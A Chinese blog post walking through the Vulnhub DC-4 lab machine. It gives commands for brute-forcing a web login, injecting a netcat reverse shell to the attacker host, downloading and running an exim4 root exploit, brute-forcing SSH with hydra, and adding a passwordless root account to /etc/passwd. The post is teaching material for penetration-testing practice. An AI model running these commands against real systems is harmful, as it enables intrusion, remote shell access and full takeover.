<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
       
      <meta name="keywords" content="渗透" />
       
      <meta name="description" content="选择有时候比努力更重要" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>Vulnhub系列-DC4靶场 |  知识加油站</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    <link rel="alternate" href="/atom.xml" title="知识加油站" type="application/atom+xml">
</head>
  </html>
</html>


<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-Vulnhub系列-DC4靶场"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Vulnhub系列-DC4靶场
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/06/05/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/" class="article-date">
  <time datetime="2023-06-05T05:34:09.000Z" itemprop="datePublished">2023-06-05</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.1k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">4 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h3 id="一、前期准备"><a href="#一、前期准备" class="headerlink" title="一、前期准备"></a>一、前期准备</h3><h4 id="1-下载地址"><a href="#1-下载地址" class="headerlink" title="1.下载地址"></a>1.下载地址</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.vulnhub.com/entry/dc-4,313/</span><br></pre></td></tr></table></figure>



<h4 id="2-利用工具"><a href="#2-利用工具" class="headerlink" title="2.利用工具"></a>2.利用工具</h4><p><strong>注意：</strong>网络设置需要修改哦</p>
<p>kali  桥接模式</p>
<p>DC-4 桥接模式</p>
<span id="more"></span>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230605134110517.png" alt="image-20230605134110517"></p>
<h3 id="二、信息收集"><a href="#二、信息收集" class="headerlink" title="二、信息收集"></a>二、信息收集</h3><h4 id="1-主机发现"><a href="#1-主机发现" class="headerlink" title="1.主机发现"></a>1.主机发现</h4><p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230605142153347.png" alt="image-20230605142153347"></p>
<p>发现靶机目标IP为192.168.1.9</p>
<blockquote>
<p>kali		192.168.1.49</p>
<p>dc-4		192.168.1.9</p>
</blockquote>
<h4 id="2-nmap扫描"><a href="#2-nmap扫描" class="headerlink" title="2.nmap扫描"></a>2.nmap扫描</h4><p>nmap扫描同一网段下主机及其开放端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 192.168.1.1/24</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609090634584.png" alt="image-20230609090634584"></p>
<p>nmap扫描指定靶机IP开放端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A -p 1-65535 192.168.1.9</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609094348637.png" alt="image-20230609094348637"></p>
<p>发现开放了两个端口，80和22端口</p>
<h4 id="3-收集网站信息"><a href="#3-收集网站信息" class="headerlink" title="3.收集网站信息"></a>3.收集网站信息</h4><p>发现一个登录页面</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609094823307.png" alt="image-20230609094823307"></p>
<p>根据网页信息，有admin用户</p>
<h3 id="三、web渗透"><a href="#三、web渗透" class="headerlink" title="三、web渗透"></a>三、web渗透</h3><h4 id="1-爆破登录密码"><a href="#1-爆破登录密码" class="headerlink" title="1.爆破登录密码"></a>1.爆破登录密码</h4><p>我们利用burp抓包爆破一下密码，字典上网上搜索一个，我的是十万多个的密码字典，地址就不写了，在github中可以找到的。</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609100856139.png" alt="image-20230609100856139"></p>
<p>密码是happy</p>
<p>拿到密码尝试登录</p>
<h4 id="2-测试漏洞"><a href="#2-测试漏洞" class="headerlink" title="2.测试漏洞"></a>2.测试漏洞</h4><p>登陆后</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609101102700.png" alt="image-20230609101102700"></p>
<p>点击命令，出现如下图</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609101146677.png" alt="image-20230609101146677"></p>
<p>好像是在执行系统命令，所以直接抓包改改数据</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609101913955.png" alt="image-20230609101913955"></p>
<p>确认是执行linux系统命令，尝试反弹shell。</p>
<h4 id="3-反弹shell"><a href="#3-反弹shell" class="headerlink" title="3.反弹shell"></a>3.反弹shell</h4><p>在kali中设置监听端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 12445</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609102510493.png" alt="image-20230609102510493"></p>
<p>在burp中反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc+-e+/bin/bash+192.168.1.49+12445</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609102345123.png" alt="image-20230609102345123"></p>
<p>连接成功后为了方便，我们可以进入交互式shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609103024096.png" alt="image-20230609103024096"></p>
<h3 id="四、提权"><a href="#四、提权" class="headerlink" title="四、提权"></a>四、提权</h3><h4 id="1-提权方法一"><a href="#1-提权方法一" class="headerlink" title="1.提权方法一"></a>1.提权方法一</h4><h5 id="找提权方法"><a href="#找提权方法" class="headerlink" title="找提权方法"></a>找提权方法</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -user root -perm -4000 -print 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609104124383.png" alt="image-20230609104124383"></p>
<p>发现一个exim4</p>
<blockquote>
<p>Exim是基于GPL协议的开放源代码软件，由英国剑桥大学的Philip Hazel开发，目前最新版4.24。Exim是一个MTA（Message Transfer Agent），即消息传输代理，负责邮件的路由、转发和投递。Exim被作者设计成可运行于绝大多数的类Unix系统上，包括 Solaris，AIX，Linux等。<br>　 　Exim与其它开源的MTA（QMail、Postfix）相比，最大的特点是配置极其灵活。Exim的配置文件也是一个文本文件，但它支持一种称为 String Expansion的技术。String Expansion可以理解为一种简单的脚本语言，能够执行诸如条件判断、字符串转换等功能。当然，Exim基本的功能也是非常丰富的。</p>
</blockquote>
<p>查看一下exim4版本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exim4 --version</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609104654503.png" alt="image-20230609104654503"></p>
<p>exim4版本为4.87</p>
<h5 id="搜素本地漏洞库"><a href="#搜素本地漏洞库" class="headerlink" title="搜素本地漏洞库"></a>搜素本地漏洞库</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit exim4</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609105944950.png" alt="image-20230609105944950"></p>
<p>将46996.sh移动到桌面</p>
<h5 id="开启文件传输"><a href="#开启文件传输" class="headerlink" title="开启文件传输"></a>开启文件传输</h5><p>在桌面开启一个传输服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server 5566</span><br></pre></td></tr></table></figure>

<p>在dc4靶机中获取这个文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http://192.168.1.49:5566/46996.sh</span><br></pre></td></tr></table></figure>

<p>下载成功，给执行权限，并且运行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod +x 46996.sh</span><br></pre></td></tr></table></figure>

<p>最终拿到root权限</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609113142110.png" alt="image-20230609113142110"></p>
<p>但这个貌似不是本题的正解，算是非预期解吧</p>
<h4 id="2-提权方法二"><a href="#2-提权方法二" class="headerlink" title="2.提权方法二"></a>2.提权方法二</h4><p>在靶机中翻看有什么文件</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609132357563.png" alt="image-20230609132357563"></p>
<p>在backups目录下发现一个类似密码字典的文件，应该是让我们爆破jim</p>
<h5 id="hydra爆破密码"><a href="#hydra爆破密码" class="headerlink" title="hydra爆破密码"></a>hydra爆破密码</h5><p>把文件内容复制，保存到kali里，保存名称为 <code>pass.txt</code> ，爆破使用hydra</p>
<blockquote>
<p>Hydra是一款非常强大的暴力破解工具，它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具，主要目的是：<strong>展示安全研究人员从远程获取一个系统认证权限。</strong></p>
<p>在kali中内置</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l jim -P pass.txt 192.168.1.9 ssh</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609133628896.png" alt="image-20230609133628896"></p>
<p>得到账号密码</p>
<blockquote>
<p>账号：jim</p>
<p>密码：jibril04</p>
</blockquote>
<h5 id="ssh连接登录"><a href="#ssh连接登录" class="headerlink" title="ssh连接登录"></a>ssh连接登录</h5><p>使用kali进行ssh连接登录，输入两个yes，输入密码即可登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh @192.168.1.9</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609133854300.png" alt="image-20230609133854300"></p>
<p>接下来开始搜索文件</p>
<p>发现jim有一封邮件</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609134101066.png" alt="image-20230609134101066"></p>
<p>进入邮件目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd var/spool/mail</span><br></pre></td></tr></table></figure>

<p>进入后发现jim的邮件</p>
<p>打开之后</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609134330800.png" alt="image-20230609134330800"></p>
<p>可以看到发件人的账号和密码</p>
<blockquote>
<p>账号：charles</p>
<p>密码：^xHhA&amp;hvim0y</p>
</blockquote>
<p>直接su xxx切换用户</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609134602360.png" alt="image-20230609134602360"></p>
<p>发现，账号都是小写的才可以</p>
<h5 id="teehee提权"><a href="#teehee提权" class="headerlink" title="teehee提权"></a>teehee提权</h5><p>查看使用sudo运行的命令</p>
<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609134715585.png" alt="image-20230609134715585"></p>
<p>可以使用teehee提权，那我们可以用teehee写一些信息到 <code>/etc/passwd</code> 里面</p>
<blockquote>
<p>&#x2F;etc&#x2F;passwd 内每个字段的含义</p>
<p>username:password:User ID:Group ID:comment:home directory:shell</p>
</blockquote>
<p>用户名admin，没有密码为管理员权限，进入的时候运行&#x2F;bin&#x2F;bash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;admin::0:0:::/bin/bash&quot; | sudo teehee -a /etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609135621833.png" alt="image-20230609135621833"></p>
<h5 id="查找flag"><a href="#查找flag" class="headerlink" title="查找flag"></a>查找flag</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name *flag*</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609135811806.png" alt="image-20230609135811806"></p>
<p>发现flag在 <code>/root</code> 目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /root/flag.txt</span><br></pre></td></tr></table></figure>

<p><img src="/./../images/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/image-20230609140035724.png" alt="image-20230609140035724"></p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2023/06/05/Vulnhub%E7%B3%BB%E5%88%97-DC4%E9%9D%B6%E5%9C%BA/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2023/06/05/Vulnhub%E7%B3%BB%E5%88%97-DC5%E9%9D%B6%E5%9C%BA/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Vulnhub系列-DC5靶场
          
        </div>
      </a>
    
    
      <a href="/2023/06/05/Vulnhub%E7%B3%BB%E5%88%97-DC3%E9%9D%B6%E5%9C%BA/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">Vulnhub系列-DC3靶场</div>
      </a>
    
  </nav>

  
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2022-2023
        <i class="ri-heart-fill heart_icon"></i> 深山法海
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="知识加油站"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags/%E6%97%85%E8%A1%8C/">旅行</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/2019/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/dashang.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>